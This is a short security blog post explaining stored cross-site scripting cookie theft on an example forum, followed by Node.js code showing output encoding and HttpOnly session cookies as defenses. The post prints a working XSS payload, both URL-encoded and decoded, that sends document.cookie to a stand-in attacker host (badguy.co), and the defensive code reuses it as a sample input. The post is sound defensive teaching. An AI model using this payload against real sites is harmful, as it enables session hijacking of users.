Wednesday, April 20, 2016

XSS Cookie Theft

There are still scenarios where cookie theft is useful to an attacker. If an XSS (Cross-Site Scripting) vulnerability exists on your website, the attacker may use it to swipe your customers' cookies and then use them to log in with their session or to collect other information stored in the cookies. Let's see an example.

Assume a website sets a valuable sessionid cookie that the bad guy wants to steal from your end users. Suppose he finds an XSS vulnerability on your website, such as in the "name" parameter below, so that when he changes the title of a forum post he is allowed to inject JavaScript into the title instead of just text

http://www.goodforum.com/post?name=MyTitle

... and the attacker finds out that the JavaScript he saves into the title gets executed every time a user loads his forum post. This type of XSS is called stored XSS, and the attacker could inject a malicious payload such as

http://www.goodforum.com/post?name=new%20Image().src%20%3D%20%27http%3A%2F%2Fbadguy.co%2Feat.php%3Fcookie%3D%27%20%2B%20encodeURI(document.cookie)%3B

If you decode the XSS payload you see this JavaScript code

new Image().src = 'http://badguy.co/eat.php?cookie=' + encodeURI(document.cookie);

If you watch this code execute in the browser you see a callout to the bad guy's server, and oops, the sessionid cookie has gone out with it!

It's that simple. Now if the bad guy checks his web logs, he can see the user's session id value, and if he's using the proper tools he has probably automated it to the point where his tooling takes the session id, immediately opens the attacker's browser with the end user's session, and lets him browse around the website as that user. So take XSS seriously and fix those vulnerabilities!
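As an added example (not code from the original post), here are the two defenses this scenario calls for, written as plain Node.js functions: HTML-encoding the "name" parameter before it is rendered, and setting the session cookie with HttpOnly so document.cookie cannot read it. The h1 template, the cookie attributes and the session id format are assumptions.

```javascript
// Added example, not from the original post. Assumptions: the forum renders the
// "name" parameter inside an HTML <h1>, and the session cookie is named
// "sessionid" as in the post.

// 1. Encode untrusted text for an HTML element context, so a title containing
//    markup or script is displayed literally instead of being parsed.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Render the forum post title safely. `name` is the raw, attacker-controlled value.
function renderPostTitle(name) {
  return `<h1 class="post-title">${escapeHtml(name)}</h1>`;
}

// 2. Build the Set-Cookie header for the session. HttpOnly keeps the cookie out
//    of document.cookie, so even a successful XSS cannot read it with the
//    payload shown above; Secure and SameSite limit where the browser sends it.
function sessionCookieHeader(sessionId) {
  // Session ids are opaque tokens; reject anything that could alter the header.
  if (!/^[A-Za-z0-9_-]+$/.test(sessionId)) {
    throw new Error('invalid session id');
  }
  return `sessionid=${sessionId}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed sample inputs: the decoded payload from the post, and a title that
// wraps the same payload in a <script> tag.
const rawPayload =
  "new Image().src = 'http://badguy.co/eat.php?cookie=' + encodeURI(document.cookie);";
const scriptTitle = '<script>' + rawPayload + '</script>';

// Returns what the server would emit for the hostile title and a sample session.
function demo() {
  return {
    title: renderPostTitle(scriptTitle),
    cookie: sessionCookieHeader('abc123'),
  };
}
```

The encoded title contains no `<script` tag the browser would execute, and because the cookie carries HttpOnly, `document.cookie` in the page would not include sessionid even if the encoding were missed somewhere else.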

More about neonprimetime


Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
